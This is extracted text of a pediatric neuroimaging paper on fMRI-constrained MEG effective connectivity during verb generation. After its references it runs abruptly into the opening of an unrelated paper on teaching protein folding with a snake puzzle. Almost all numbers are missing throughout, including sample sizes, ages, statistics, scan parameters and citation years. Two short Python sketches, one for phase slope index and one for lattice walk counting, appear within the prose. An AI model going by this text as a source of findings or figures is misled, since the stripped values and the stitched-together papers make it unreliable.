the focus of the current study is on integration of data from the two imaging modal- ities and the novel application of effective connectivity ana- lyses for mapping a core functional network. data acquisition functional magnetic resonance imaging participants. the fmri cohort included typically de- veloping children ( males), ages – years (m = . , sd = . ), studied at cincinnati children’s hospital medical center (cincinnati, oh) between and . this a slightly larger cohort than initially described in holland and associates ( ), as recruitment continued beyond initial analysis and publication. all participants in the study were na- tive english speakers, free from language disability, learning disability, and neurological disorder. edinburgh handedness inventory (ehi; oldfield, ) scores indicate that were right handed, left handed, and ambidextrous. parents provided consent, and children aged years and older assented to participate. the study was approved by the hospital’s institutional review board. fmri verb generation. children alternately listened to re- cordings of concrete nouns generated by an adult female speaker (task block) or speech-frequency warble tones (control block). during the task block, children covertly generated ac- tion words corresponding to each noun. the noun stimuli were presented at a rate of once every sec, in five -sec blocks. during the control block, children were asked to simply listen to each tone. warble tones were presented every sec, in six -sec blocks. participants listened to a total of nouns and warble tones during the . min fmri recordings. functional and structural mri scanning was performed on a bruker biospec / t system (bruker medizintechnik, karlsruhe, germany). the fmri scans were acquired using a t *-weighted gradient echo epi sequence (te = msec, tr = msec, fov = · mm, slice thickness = mm). at each of the time points, slices were acquired. the initial time points (corresponding to a control block) were discarded to allow protons to reach t relaxation equilib- rium. a t -weighted whole brain structural image was acquired using a d mdeft scan (te = . msec, tr = . msec, voxel size = . · . · . mm). magnetoencephalography participants. the meg cohort included typically de- veloping children ( males), ages – years (m = . , sd = . ), scanned at the hospital for sick children (tor- onto, on) between and . this a subset of partici- pants described in kadis and associates ( ); only subjects with structural mris of sufficient quality for automated seg- mentation and single-shell head modeling in spm were in- cluded in this study (see forward modeling description mapping effective connectivity with fmri-constrained meg under ‘‘extraction of nodal time courses from meg data’’ section, below). participants were native english speakers, negative for history of neurological disorder, learning disabil- ity, and language disturbance. children showed a typical distribution of hand preference, with right handed and ambidextrous, based on ehi scores. parents provided consent, and children and adolescents assented to participate. the study was approved by the hospital’s research ethics board. meg verb generation. participants alternately viewed color pictures of everyday objects (task condition) or scrambled color images with a superimposed central fixation cross (con- trol condition). task stimuli were presented for msec, and control stimuli were presented for – msec (jit- tered). the order of presentation was random within each con- dition. 
for the task condition, children were required to covertly generate a verb for each object viewed, as quickly as possible. for the control condition, children were asked to look at the central fixation cross. overt assessment following meg acquisition showed that all participants were able to per- form the task, and children aged – had a mean accuracy of % across trials. meg scanning was performed on a -channel whole- head ctf system ( meg international services ltd., coqui- tlam, bc, canada). subjects were tested in the supine position, with the projection screen positioned above the lower face and neck region, for comfortable viewing. stimuli were presented within – � of the center of the visual field to promote foveal projection. head localization coils were placed at nasion and preauricular points to monitor move- ment. data were acquired at hz, with an online - hz low-pass filter. in all cases, head displacement was less than mm from the beginning to end of acquisition. to facil- itate meg-mri coregistration (required for accurate forward modeling in source analyses), multimodal radiographic markers were placed at the nasion and preauricular positions before acquiring structural images. mri was conducted on a ge signa advantage . t scanner (ge medical, milwaukee, wi). a whole brain t -weighted image was acquired using a d-spgr scan (te = . msec, tr = msec, voxel size = . · . · . mm). analyses fmri analyses. image preprocessing and first-level ana- lyses were carried out using the cincinnati children’s hos- pital image processing software (cchips; schmithorst and dardzinski, ). epi data were corrected for geomet- ric distortion due to b field inhomogeneity (schmithorst et al., ) and coregistered to minimize motion effects (thevenaz et al., ). an experienced rater identified land- marks on each subject’s structural image, which were used to linearly transform structural and functional data to a standard space (talairach and tournoux, ). functional data were cross correlated with a reference waveform reflecting the time course of task and control blocks, and a t-statistic (verbs minus tones) was computed on a voxel-wise basis. second-level analyses were carried out in spm (www .fil.ion.ucl.ac.uk/spm/) running in matlab r a (the mathworks, inc., natick, ma). individual contrast images were submitted to group analyses in a single sample t test. we identified brain regions showing significantly increased acti- vation for verb generation, using a family-wise error correc- tion of p < . and clustering threshold of k = voxels. parcellation of the activation map. as an initial step to in- terrogating the distributed expressive language network for patterns of effective connectivity, we parcellated the group map and established a set of cortical node locations. the group activation map was normalized to the mni subject average t -weighted image template and binarized such that only suprathreshold voxels were retained. we cropped the resulting activation map using a gray matter mask (to isolate cortex; mask supplied with spm ), resampled the image to . mm isotropic, and multiplied the activation by a random, -unit parcellation scheme (provided as a . mm isotropic image) recently introduced by craddock and associates ( ). centroids of cortical parcels with > active voxels serve as network nodes. 
the -unit parcellation scheme provides a good trade-off between anatomical interpretabil- ity and functional homogeneity (craddock et al., ), and the node density approximates the specificity of our sub- sequent beamformer analyses (i.e., limited by the under de- terminacy of the inverse; source analyses described below). extraction of nodal time courses from meg data. pre- processing was carried out using fieldtrip (oostenveld et al., ) in matlab r a. each participant’s meg recording was imported and epoched from � to msec, relative to the onset of target picture presentation. trials were baseline corrected (using the � to msec window as a baseline), and power line noise was attenuated using a -hz discrete fourier transform filter. scanner jump artifacts were automatically identified and trials containing artifacts rejected from each dataset. forward modeling was conducted in spm . each sub- ject’s t -weighted mri was imported, segmented, and then warped to the mni template to establish a normal- ization deformation field. the source model was constructed from a standard -vertex cortical mesh that was warped to the individual subject’s cortex using the inverse of the deformation. fiducial locations were manually identified on each subject’s structural mri, facilitating coregistration with meg data. finally, realistic single-shell head models were constructed from the segmented images and lead fields computed using default conductivity parameters. the neuronal activity at each network node was com- puted using fieldtrip’s linearly constrained minimum vari- ance beamformer (with . % regularization, for spheres of mm radius), implemented in spm . trial data were then cropped to – msec from picture onset, to isolate neu- romagnetic changes reflecting the generative period of the expressive language task (kadis et al., ) in subsequent connectivity analyses. effective connectivity analyses. we estimated effective connectivity between each pair of network nodes using the psi metric, recently introduced by nolte and associates ( ; see also, nolte and müller, ; haufe et al., ). psi is computed from the complex coherency func- tion for a pair of signals, and directionality is determined from phase differences in signals over a specified frequency range. when signal i drives (is driven by) signal j, the mean phase differences between i and j will increase (decrease) kadis et al. with frequency and psi will be positive (negative). for con- venience, psi is often reported as a normalized value, obtained through division by an estimate of standard devia- tion (here, jackknife resampling was used). the normalized value, psinorm, can then be interpreted as any z-value would, facilitating statistical thresholding and group-wise quantitation. in the current study, we computed psinorm for each node pair within canonical bands (delta, * – hz, low frequency limited by time window; theta, – hz; alpha, – hz; beta, – hz; and gamma, – hz) for each subject. to iden- tify significant connections, data are thresholded at psinorm ‡ . . the value of – . corresponds to the critical value in a two-tailed normal deviate (z) test conducted at alpha = . ; because the psi metrics for any given node pair are an addi- tive inverse (i.e., the psi for signal i driving j is the nega- tive of psi for j driving i), only one direction of flux need be considered. 
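a minimal numpy sketch of the normalized psi computation described above is given below: complex coherency is estimated from epoched data, the phase slope is accumulated over neighbouring frequency bins within a band, and the result is normalized by a jackknife estimate of its standard deviation. the function names, the windowing choices, and the toy signals are illustrative assumptions and not the fieldtrip/spm implementation used in the study.

```python
import numpy as np

def spectra(x, y, fs):
    """Per-epoch auto- and cross-spectra via a Hann-windowed FFT.
    x, y: arrays of shape (n_epochs, n_samples)."""
    win = np.hanning(x.shape[1])
    fx = np.fft.rfft(x * win, axis=1)
    fy = np.fft.rfft(y * win, axis=1)
    freqs = np.fft.rfftfreq(x.shape[1], d=1.0 / fs)
    return freqs, fx * np.conj(fy), (fx * np.conj(fx)).real, (fy * np.conj(fy)).real

def psi(sxy, sxx, syy, band):
    """Phase slope index over the frequency bins selected by the boolean mask
    `band`: Im( sum_f conj(C(f)) C(f + df) ), where C is the complex coherency
    averaged over epochs (after Nolte and colleagues)."""
    c = sxy.mean(axis=0) / np.sqrt(sxx.mean(axis=0) * syy.mean(axis=0))
    idx = np.where(band)[0]
    return np.imag(np.sum(np.conj(c[idx[:-1]]) * c[idx[1:]]))

def psi_norm(x, y, fs, fmin, fmax):
    """PSI normalized by a jackknife (leave-one-epoch-out) estimate of its std."""
    freqs, sxy, sxx, syy = spectra(x, y, fs)
    band = (freqs >= fmin) & (freqs <= fmax)
    full = psi(sxy, sxx, syy, band)
    n = x.shape[0]
    loo = np.array([psi(np.delete(sxy, k, 0), np.delete(sxx, k, 0),
                        np.delete(syy, k, 0), band) for k in range(n)])
    std = np.sqrt((n - 1) / n * np.sum((loo - loo.mean()) ** 2))
    return full / std

# toy usage: `driver` leads `follower` by a few samples, so the phase of the
# coherency increases with frequency and the normalized psi should be positive
rng = np.random.default_rng(0)
driver = rng.standard_normal((120, 600))
follower = np.roll(driver, 8, axis=1) + 0.5 * rng.standard_normal((120, 600))
print(psi_norm(driver, follower, fs=600, fmin=13, fmax=25))
```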
results network definition group analyses of the fmri data revealed consistent acti- vation across individuals in bilateral frontal (including in- sular cortex) and posterior temporal regions, and the left anterior cingulate and right occipital cortices. as expected, the activation encompasses canonical language regions of the left hemisphere (i.e., broca’s and wernicke’s areas) and, to a lesser extent, their right hemisphere homologues. occipital activation has been previously noted in this task and likely relates to visualization associated with the stimu- lus and response (i.e., visualization of the everyday object and/or associated activities). group activation is shown in figure . the parcellation procedure yielded cortical network nodes. of these, were located in the left hemisphere, with the largest cluster focused around the inferior, middle, and superior frontal cortices. the application of a -unit random parcellation scheme and the resulting set of network nodes are depicted in figure . node coordinates and their anatomical labels are presented in supplementary table s (supplementary data are available online at www.liebertpub .com/brain). density of effective connections subjects had between and (m = . , sd = . ) supra- threshold effective connections among network nodes, summed across all frequency bands. the number of surviv- ing connections did not differ among frequency bands ( p > . ). age-related changes in density of effective connec- tions. the total number of suprathreshold connections was positively and linearly correlated with subject age (r = . , n = , p £ . ), suggesting that older children and adoles- cents meaningfully engage a greater portion of the distrib- uted network during verb generation than younger children do (figure ). within any particular frequency band, the number of surviving effective connections failed to correlate with age ( p > . , uncorrected; supplementary fig. s ). patterns of effective connectivity across frequency spectra to characterize frequency-related differences in patterns of information flux during verb generation in children, we plotted suprathreshold effective connections for each fre- quency bin across all subjects on a template brain (fig. ). we observed distinct patterns of information flux across the spectra. in general, low-frequency information flux was focused within the left frontal region; at higher frequencies, effective connectivity was increasingly observed between distal nodes. within the delta band, information flux was predominantly rostrally directed and focused among proximal nodes of the left inferior and middle frontal gyri. in the theta band, the spa- tial distribution of suprathreshold connections was somewhat broader. we observed a high density of effective connections be- tween putative wernicke’s and broca’s areas in the theta, beta, and gamma bands, which were predominantly rostrally directed. in the alpha, beta, and gamma bands, we observed signif- icant interhemispheric effective connectivity. in alpha and beta, bidirectional information transfer was observed be- tween left and right frontal nodes and between left and right posterior temporal nodes. in gamma, the right posterior temporal region emerged as an important driver of both left fig. . group fmri acti- vation for verb generation. colored areas depict signifi- cant fmri activation in children performing verb generation in fmri, projected on a template brain ( p < . , fwe corrected; minimum clustering threshold of k = voxels of . · . · . 
mm dimension). fmri, functional magnetic resonance imaging. mapping effective connectivity with fmri-constrained meg posterior temporal (wernicke’s) and left frontal (broca’s) re- gions, although this region appears to be driven by the left posterior region at lower frequencies. across frequency bins, we observed significant informa- tion flux between wernicke’s and broca’s areas. however, only minimal effective connectivity was observed between right posterior temporal and right frontal regions, indicating that the right hemisphere language homologues do not sim- ply mirror the function/connectivity of the canonical lan- guage regions in typically developing children. discussion in this study, we integrated fmri and meg data to characterize information flux within the distributed pediatric expressive language network. the approach extends the con- ventional analysis of task-related changes in bold signal or oscillatory power in fmri and meg; in this study, we map function through patterns of significant effective connectiv- ity, estimated from fast recordings of neuronal population activity. the framework can be easily generalized to charac- terize cortical transmission of information for other cogni- tive domains. the parcellation and meg analysis approach could also be used to interrogate any arbitrarily defined brain network for patterns of effective connectivity (e.g., as- sess information flux within a theoretically derived network defined by anatomical boundaries), in the absence of avail- able fmri data. using thresholded normalized psi to identify regions of significant information flux, we clearly resolved a core left frontal subnetwork consisting of nodes in the inferior, middle, and superior frontal gyri and insula, which support verb generation (expressive language) in our pediatric sam- ple. although some degree of suprathreshold connectivity was observed between all nodal regions, only the left frontal regions showed significant information flux at all frequency bands studied. this preferential localization is consistent fig. . parcellation and definition of the functional network. (a) depiction of parcellation scheme in axial slices; each colored patch represents a distinct parcel; the centroids of active parcels are used to define network node locations. (b) the resulting nodes are depicted as colored spheres on a template brain; left hemisphere nodes (n = ) are shown in blue and right hemisphere nodes (n = ) are shown in red. fig. . age-related increase in number of significant ef- fective connections. for each subject, the number of signifi- cant effective connections was summed across all frequency bands. plot shows the significant age-related increase in the total number of suprathreshold (psinorm ‡ . ) effective connections observed within the distributed network (r = . , n = , p £ . ). psi, phase slope index. kadis et al. with the earliest accounts of expressive language disturbance following left inferior frontal injury (e.g., broca, ; see also, dronkers, ) and subsequent clinically informed models of gross language representation championed by geschwind ( , ). localization is also consistent with previous neuroimaging studies of expressive language in both children (e.g., karunanayaka et al., , ) and adults (e.g., mccarthy et al., ; szaflarski et al., ). in general, the left inferior and middle frontal cortex has been implicated in semantic processing and word retriev- al; the insular cortex is involved in speech or articulatory planning (price, ). 
uniquely, we observed changing patterns of effective connectivity among the network nodes, depending on the frequency analyzed. in the delta band, rostrally directed effective connections were focused within the left frontal nodes. progressing through theta, alpha, and beta bands, we see a transition to predominantly caudally directed con- nections among the same nodes. findings highlight the var- iable nature of information flow that can occur among a fixed set of nodes, at different frequencies. similarly, we observed changes in the spatial distribution of information flux across the spectra. in the delta and theta bands, we observe effective connectivity primarily between proximal left inferior frontal nodes; in the alpha and beta bands, we see increasing in- volvement of midline regions, and at beta and gamma, we observe bilateral posterior temporal nodes emerging as im- portant drivers in the network. these spectrally resolved changes in patterns of information flux cannot be resolved in conventional neuroimaging. we expect that increased ac- cess to meg for studying language will necessitate updates to the current network models, to account for the distinct pat- terns of connectivity that occur at various timescales. across frequency bands, the total number of suprathres- hold effective connections was found to increase with age in our pediatric sample. the finding initially appears to run counter to the established literature showing relatively bilat- eral and extensive representation in the youngest children (e.g., szaflarski et al., ; kadis et al., ). however, we propose that patterns of significant information flux re- veal the core components of a network—those regions that are engaged in a consistent coordinated manner and are nec- essary for function—reflecting the neural strategy used for task completion. we do not expect developmental changes in effective connectivity to track with developmental changes in task-related bold signal or oscillatory power distribution. collectively, the data suggest that young chil- dren possess a broadly distributed expressive language net- work, as evidenced from conventional neuroimaging, with relatively few core (vulnerable) nodes. relative plasticity for language representation in young children is possible be- cause the broader network lacks established core nodes. with development, the extent of the overall network decreases, while patterns of information flux become entrained. a left lateralized, focal, core expressive language network emerges as part of the normal developmental trajectory, and plasticity is diminished. in the future, we hope to assess the stability of these connectivity patterns through adulthood. in this study, fmri data served as a ‘‘hard constraint’’ on subsequent meg effective connectivity analyses. by ap- plying an activation map that was established through large-scale investigation, we unambiguously focus on brain regions known to undergo task-related hemodynamic changes during verb generation in children. parcellation of the fmri activation map serves to reduce the number of comparisons needed to characterize information flux. we fig. . effective connec- tivity within canonical fre- quency bands. significant node-to-node effective con- nections are represented as green arrows, which indicate the direction of information flow. the thickness of each arrow reflects the relative frequency of suprathreshold effective connectivity across subjects. 
mapping effective connectivity with fmri-constrained meg preferred a multimodal approach over unimodal meg, since methods used to identify language cortex in fmri have been relatively well established and the extent of cortex involved is easily interpreted from an activation map. in contrast, the choice of source localization approach in meg will impact ensuing functional maps and most attempts to solve the in- verse solution produce localizations that are difficult to in- terpret in terms of extent (e.g., equivalent current dipole analysis, beamforming). the tasks used in each imaging modality were highly similar, but not identical. in fmri, auditory noun stimuli were used; in meg, pictures of everyday objects were pre- ferred. according to current language models, the auditory or visual stimuli preferentially engage their respective sensory cortices; however, both versions of the task will ul- timately require engagement of a broader stimulus modality- independent language network necessary for semantic processing, word retrieval, and articulatory planning related to verb generation (price, ). since the broad activation map was defined using an auditory fmri paradigm, and ef- fective connectivity was assessed from meg data collected using a visual paradigm, the resulting effective connectivity map should reflect only the elements of the expressive lan- guage network that are modality nonspecific. in this way, we isolate the language-specific subprocesses involved in verb generation. in the current analyses, we study information flux occur- ring between node pairs, without imparting any theoretical or anatomical restrictions on where network edges may be established. the data-driven approach is objective, but could potentially yield connectivity maps that do not reflect the underlying physiological structure of the language net- work. with the current approach, it is indeed possible to observe significant information flux between two regions that are not directly connected by any known fiber pathway. furthermore, we limited our analyses to regions shown ac- tive in large-scale fmri analyses; it is possible that nodes re- siding outside the defined network could also be involved in expressive language processing, particularly in individual subjects. these connections could not be resolved in the cur- rent analyses. it is important to note that the psi metric requires specifi- cation of both time and frequency ranges for computation. in this study, we cropped our data to a time window known to be relevant for verb generation in children (kadis et al., ) and restricted analyses to within canonical frequency bands. had we assessed phase slope across the broadband data, we would have failed to capture the changing direction of information flux among left frontal nodes and missed the changing patterns of connectivity that occur across the spec- tra. the choice of temporal and spectral window is not triv- ial; with additional experience, we anticipate proposing guidelines so researchers can make informed decisions about the parameters used in effective connectivity analyses with psi and related metrics. we are currently investigating other methods to integrate fmri and meg data, to map core language sites in healthy children and those undergoing investigations for epilepsy surgery. with continued development of multimodal neuro- imaging and connectivity analyses, we will gain access to a better understanding of normal language development, plas- ticity, and representation in the brain. 
acknowledgments the fmri data were obtained through support from the national institute of child health and human development (r -hd ; s.k.h.), and the meg data were obtained through support from the university of toronto (d.s.k./ m.l.s.). the authors wish to acknowledge akila rajagopal and thomas maloney for their technical assistance with the study. author disclosure statement no competing financial interests exist. references ballantyne ao, spilkin am, hesselink j, trauner da. . plasticity in the developing brain: intellectual, language and academic functions in children with ischaemic perinatal stroke. brain : – . bates e, reilly j, wulfeck b, dronkers n, opie m, fenson j, et al. . differential effects of unilateral lesions on lan- guage production in children and adults. brain lang : – . branch c, milner b, rasmussen t. . intracarotid sodium amytal for the lateralization of cerebral speech dominance; observations in patients. j neurosurg : – . brazdil m, zakopcan j, kuba r, fanfrdlova z, rektor i. . atypical hemispheric language dominance in left temporal lobe epilepsy as a result of the reorganization of language functions. epilepsy behav : – . broca pp. . remarques sur le siége de la faculté du langage articulé, suivies d’une observation d’aphémie (perte de la pa- role). bulletin de la société anthropologique : – . brown tt, lugar hm, coalson rs, miezin fm, petersen se, schlaggar bl. . developmental changes in human cere- bral functional organization for word generation. cereb cor- tex : – . craddock rc, james ga, holtzheimer pe, rd, hu xp, mayberg hs. . a whole brain fmri atlas generated via spatially constrained spectral clustering. hum brain mapp : – . geschwind n. . the organization of language and the brain. science : – . geschwind n. . language and the brain. sci am : – . gummadavelli a, wang y, guo x, pardos m, chu h, liu y, et al. . spatiotemporal and frequency signatures of word recognition in the developing brain: a magnetoencepha- lographic study. brain res : – . haufe s, nikulin vv, muller kr, nolte g. . a critical as- sessment of connectivity measures for eeg data: a simula- tion study. neuroimage : – . helmstaedter c, kurthen m, linke db, elger ce. . patterns of language dominance in focal left and right hemisphere ep- ilepsies: relation to mri findings, eeg, sex, and age at onset of epilepsy. brain cogn : – . holland sk, plante e, weber byars a, strawsburg rh, schmi- thorst vj, ball ws, jr. . normal fmri brain activation patterns in children performing a verb generation task. neu- roimage : – . holland sk, vannest j, mecoli m, jacola lm, tillema jm, karunanayaka pr, et al. . functional mri of language lateralization during development in children. int j audiol : – . kadis et al. jacola lm, schapiro mb, schmithorst vj, byars aw, straws- burg rh, szaflarski jp, et al. . functional magnetic res- onance imaging reveals atypical language organization in children following perinatal left middle cerebral artery stroke. neuropediatrics : – . kadis ds, iida k, kerr en, logan wj, mcandrews mp, ochi a, et al. . intrahemispheric reorganization of language in children with medically intractable epilepsy of the left hemi- sphere. j int neuropsychol soc : – . kadis ds, kerr en, rutka jt, snead oc, rd, weiss sk, smith ml. . pathology type does not predict language lateral- ization in children with medically intractable epilepsy. epi- lepsia : – . kadis ds, pang ew, mills t, taylor mj, mcandrews mp, smith ml. . 
characterizing the normal developmental trajectory of expressive language lateralization using magne- toencephalography. j int neuropsychol soc : – . kadis ds, smith ml, mills t, pang ew. . expressive lan- guage mapping in children using meg; meg localization of expressive language cortex in healthy children: application to paediatric clinical populations. down syndr q : – . karunanayaka p, schmithorst vj, vannest j, szaflarski jp, plante e, holland sk. . a group independent component analysis of covert verb generation in children: a functional magnetic resonance imaging study. neuroimage : – . karunanayaka p, schmithorst vj, vannest j, szaflarski jp, plante e, holland sk. . a linear structural equation model for covert verb generation based on independent com- ponent analysis of fmri data from children and adolescents. front syst neurosci : . mccarthy g, blamire am, rothman dl, gruetter r, shulman rg. . echo-planar magnetic resonance imaging stud- ies of frontal cortex activation during word generation in humans. proc natl acad sci u s a : – . nolte g, muller kr. . localizing and estimating causal re- lations of interacting brain rhythms. front hum neurosci : . nolte g, ziehe a, nikulin vv, schlogl a, kramer n, brismar t, et al. . robustly estimating the flow direction of infor- mation in complex physical systems. phys rev lett : . oldfield rc. . the assessment and analysis of handedness: the edinburgh inventory. neuropsychologia : – . oostenveld r, fries p, maris e, schoffelen jm. . fieldtrip: open source software for advanced analysis of meg, eeg, and invasive electrophysiological data. comput intell neuro- sci : . pang ew, wang f, malone m, kadis ds, donner ej. . local- ization of broca’s area using verb generation tasks in the meg: validation against fmri. neurosci lett : – . price cj. . a review and synthesis of the first years of pet and fmri studies of heard speech, spoken language and reading. neuroimage : – . rasmussen t, milner b. . the role of early left-brain injury in determining lateralization of cerebral speech functions. ann n y acad sci : – . reilly js, bates ea, marchman va. . narrative discourse in children with early focal brain injury. brain lang : – . ressel v, wilke m, lidzba k, lutzenberger w, krageloh-mann i. . increases in language lateralization in normal chil- dren as observed using magnetoencephalography. brain lang : – . saltzman-benaiah j, scott k, smith ml. . factors associ- ated with atypical speech representation in children with in- tractable epilepsy. neuropsychologia : – . satz p, strauss e, wada j, orsini dl. . some correlates of intra- and interhemispheric speech organization after left focal brain injury. neuropsychologia : – . schmithorst vj, dardzinski b. . cchips/idl enables de- tailed mri analyses. schmithorst vj, dardzinski bj, holland sk. . simultane- ous correction of ghost and geometric distortion artifacts in epi using a multiecho reference scan. ieee trans med imag- ing : – . szaflarski jp, holland sk, schmithorst vj, byars aw. . fmri study of language lateralization in children and adults. hum brain mapp : – . talairach j, tournoux p. . co-planar stereotaxic atlas of the human brain: -dimensional proportional system: an approach to cerebral imaging. new york: thieme. thevenaz p, ruttimann ue, unser m. . a pyramid ap- proach to subpixel registration based on intensity. ieee trans image process : – . tillema jm, byars aw, jacola lm, schapiro mb, schmithorst vj, szaflarski jp, et al. . 
cortical reorganization of lan- guage functioning following perinatal left mca stroke. brain lang : – . vargha-khadem f, watters gv, o’gorman am. . devel- opment of speech and language following bilateral frontal le- sions. brain lang : – . address correspondence to: darren s. kadis pnrc and division of neurology cincinnati children’s hospital medical center burnet avenue cincinnati, oh e-mail: darren.kadis@cchmc.org mapping effective connectivity with fmri-constrained meg submitted june accepted october published december corresponding author alberto pascual-garcía, alberto.pascual.garcia@gmail.com, apascual@ic.ac.uk academic editor rahul shah additional information and declarations can be found on page doi . /peerj-cs. copyright nido et al. distributed under creative commons cc-by . open access learning structural bioinformatics and evolution with a snake puzzle gonzalo s. nido , ,*, ludovica bachschmid-romano ,*, ugo bastolla and alberto pascual-garcía , department of neurology, bergen university, bergen, norway department of clinical medicine, bergen university, bergen, norway department of artificial inteligence, technische universität berlin, berlin, germany centro de biología molecular ‘‘severo ochoa,’’ universidad autónoma de madrid, madrid, spain department of life sciences, imperial college london, ascot, berkshire, united kingdom * these authors contributed equally to this work. abstract we propose here a working unit for teaching basic concepts of structural bioinformatics and evolution through the example of a wooden snake puzzle, strikingly similar to toy models widely used in the literature of protein folding. in our experience, developed at a master’s course at the universidad autónoma de madrid (spain), the concreteness of this example helps to overcome difficulties caused by the interdisciplinary nature of this field and its high level of abstraction, in particular for students coming from traditional disciplines. the puzzle will allow us discussing a simple algorithm for finding folded solutions, through which we will introduce the concept of the configuration space and the contact matrix representation. this is a central tool for comparing protein structures, for studying simple models of protein energetics, and even for a qualitative discussion of folding kinetics, through the concept of the contact order. it also allows a simple representation of misfolded conformations and their free energy. these concepts will motivate evolutionary questions, which we will address by simulating a structurally constrained model of protein evolution, again modelled on the snake puzzle. in this way, we can discuss the analogy between evolutionary concepts and statistical mechanics that facilitates the understanding of both concepts. the proposed examples and literature are accessible, and we provide supplementary material (see ‘data availability’) to reproduce the numerical experiments. we also suggest possible directions to expand the unit. we hope that this work will further stimulate the adoption of games in teaching practice. subjects bioinformatics, computational biology, computer education, scientific computing and simulation keywords structural bioinformatics, education, protein folding, statistical mechanics, contact matrix, protein structure alignment, designability, evolution, contact order, protein classification introduction scientific knowledge is becoming increasingly interdisciplinary, with life sciences being one of the most significant examples. 
this field has attracted experts from different areas and backgrounds, as foreseen by schrödinger’s seminal book ‘‘what is life?’’ (schrödinger, ). in fact, life sciences offer a very interesting ground for the application of formal methods originated in other disciplines such as physics or informatics, allowing to address how to cite this article nido et al. ( ), learning structural bioinformatics and evolution with a snake puzzle. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:alberto.pascual.garcia@gmail.com mailto:apascual@ic.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. biological questions from different perspectives (lazebnik, ). in recent years, the spectacular increase of biological data promoted by high-throughput technologies boosted the development of computational tools for its analysis and classification, an essential task in itself (dougherty & braga-neto, ). we are witnessing the growth of a theoretical biology with formal parallelism with other disciplines and with the objective to identify the underlying general principles of biological systems. this scenario challenges the traditional educational programs (gallagher et al., ), often reluctant to overcome the boundaries between established disciplines. in contrast, we observe a rapid growth of interdisciplinary publications in the scientific literature, which contributes to bolster and further extend the gap between research and education. as a result, it is common that students with different backgrounds meet in the same postgraduate courses, but they often lack the skills required to work in such an integrative environment. together with the limited number of teaching hours, this situation constitutes a serious bottleneck to learning. hence, it is of great importance to find tools that help to bridge the gap between different backgrounds and favour a learning convergence (fox & ouellette, ). games can help students to assimilate abstract concepts and to address complex problems. there is a growing number of games related with topics as diverse as protein folding (cooper et al., ), spin glasses (hartmann, ), ecological networks (fortuna et al., ), biological data integration (schneider & jimenez, ), geometry (o’rourke, ) or scientific induction (gardner, ), to name a few. here we present an illustrative example where we employed a wooden snake puzzle in a structural bioinformatics course at the universidad autónoma de madrid (spain). this puzzle can be regarded as a coarse grained (toy) model of a polymer structure and it is strikingly similar to simplified mathematical models proposed in the protein folding literature (see, for instance, Šali, shakhnovich & karplus, ). we propose several exercises accessible to students with a graduate-level background in either biology or physics and notions in programming. our goal consists in giving concreteness to the subjects presented in the course through a physical object, and our experience in this sense is very positive. this example allows us to discuss the first steps in the modeling process, i.e., the definition of the system and its epistemological and practical consequences, a discussion that is often neglected. 
relying on a physical object allows us to provide a first intuitive contact with the different subjects that we treat, ranging from computational techniques, such as protein structure alignment algorithms, to theoretical concepts, such as protein folding and evolution. we argue that starting from these examples allows the lecturer to introduce more complex problems, in which real examples might be considered. we suggest along the unit different questions that may be followed to expand a course. one important aspect in which we focused in the development of these problems is the intimate relation between physics and evolution. adapting the famous quote of theodosius dobzhansky, the properties of natural proteins only make sense in the light of evolution and, conversely, the properties of protein evolution only make sense considering the constraints imposed by protein physics (liberles et al., ). furthermore, there is a deep analogy between the statistical mechanics in the space of protein conformations, which nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. governs protein folding, and the statistical mechanics in the space of protein sequences, which emerges from evolution (sella & hirsh, ). the paper is organized as follows. firstly, we present the analogy between the snake puzzle and the contact matrix representation of protein structures, and we propose a simple algorithm to solve the puzzle. the solutions are then adopted as a set of representative model structures, on which we propose computational exercises focused on evolutionary concepts. throughout the paper we suggest several discussions that are stimulated by the analogy between the computational results and real proteins, proposing chosen references that are easy to handle by postgraduate students. finally, we provide as supplementary material (see ‘data availability’) the input data needed to reproduce all the numerical experiments and the source code to execute some of them. proposed exercises puzzle description: visualization and analogies with protein structures the snake puzzle consists of a wooden chain of n blocks that must be folded into a cube. each element of the chain, except the first and the last one, is linked to two others. three linked units are constrained to form either a straight line or a turn that extends into two dimensions. there are at least two versions of the puzzle in different sizes, available in retail stores and online shops. the first version is a -unit puzzle that folds into a cube of side , and the second one is a -unit puzzle that folds into a cube of size . in accordance with the nomenclature used in the literature on polymer physics, we will refer to the former as -mer model and as -mer to the latter. the exercises proposed in the following sections are based on the -mer puzzle, which is more complex while remaining computationally tractable. our proposal is inspired by the similarity between this puzzle and the lattice models of protein structures studied in the literature (the relevant references will be presented all throughout the text). the number of possible polymer conformations on the cubic lattice is huge. taking into account the self-avoiding condition that two units cannot occupy the same cell, each new unit can be placed in at most different cells. each time that the length increases the number of conformations is multiplied by a roughly constant factor, leading to an exponential increase. 
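the exponential growth can be made concrete with a short brute-force enumeration of self-avoiding walks on the cubic lattice. the sketch below uses nothing beyond the python standard library and is only feasible for small chain lengths, which is precisely the point of the exercise; the printed ratio between successive counts illustrates the roughly constant growth factor mentioned in the text.

```python
MOVES = [(1, 0, 0), (-1, 0, 0), (0, 1, 0), (0, -1, 0), (0, 0, 1), (0, 0, -1)]

def count_saws(n):
    """Number of self-avoiding walks of n steps on the cubic lattice, starting
    from the origin (directed walks, no symmetry reduction)."""
    def extend(pos, visited, steps_left):
        if steps_left == 0:
            return 1
        total = 0
        for dx, dy, dz in MOVES:
            nxt = (pos[0] + dx, pos[1] + dy, pos[2] + dz)
            if nxt not in visited:
                total += extend(nxt, visited | {nxt}, steps_left - 1)
        return total
    return extend((0, 0, 0), {(0, 0, 0)}, n)

# the ratio c(n) / c(n - 1) approaches the connective constant of the lattice
prev = None
for n in range(1, 9):
    c = count_saws(n)
    ratio = "" if prev is None else f"  ratio {c / prev:.3f}"
    print(f"n={n}: {c}{ratio}")
    prev = c
```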
